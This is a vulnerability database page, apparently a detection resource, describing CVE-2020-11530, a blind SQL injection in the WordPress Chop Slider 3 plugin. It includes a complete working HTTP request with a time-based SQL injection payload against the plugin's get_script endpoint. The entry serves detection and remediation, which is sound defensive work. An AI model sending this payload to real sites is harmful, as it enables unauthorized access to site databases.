🔙 목록으로 돌아가기

CVE-2020-11530: WordPress Chop Slider 3 - Blind SQL Injection

TitleWordPress Chop Slider 3 - Blind SQL Injection
Authortheamanrawat
SeverityCritical
ImpactSuccessful exploitation of this vulnerability could allow an attacker to extract sensitive information from the database.
RemediationUpdate to the latest version of the WordPress Chop Slider 3 plugin to mitigate the vulnerability.
CVSS Score9.8
EPSS Score0.93134
CVE IDCVE-2020-11530
CWE IDCWE-89
Tags time-based-sqli cve cve2020 wpscan seclists sqli wordpress wp-plugin wp chopslider unauth idangero vkev vuln

🔍 Vulnerability Description

WordPress Chop Slider 3 plugin contains a blind SQL injection vulnerability via the id GET parameter supplied to get_script/index.php. The plugin can allow an attacker to execute arbitrary SQL queries in the context of the WP database user, thereby making it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.

🌐 HTTP Request

GET /wp-content/plugins/chopslider/get_script/index.php?id=1+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))A) HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Fedora; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
Connection: close
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2020/CVE-2020-11530.yaml

🦈 Packet Capture: ⬇️ Download cve-2020-11530.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A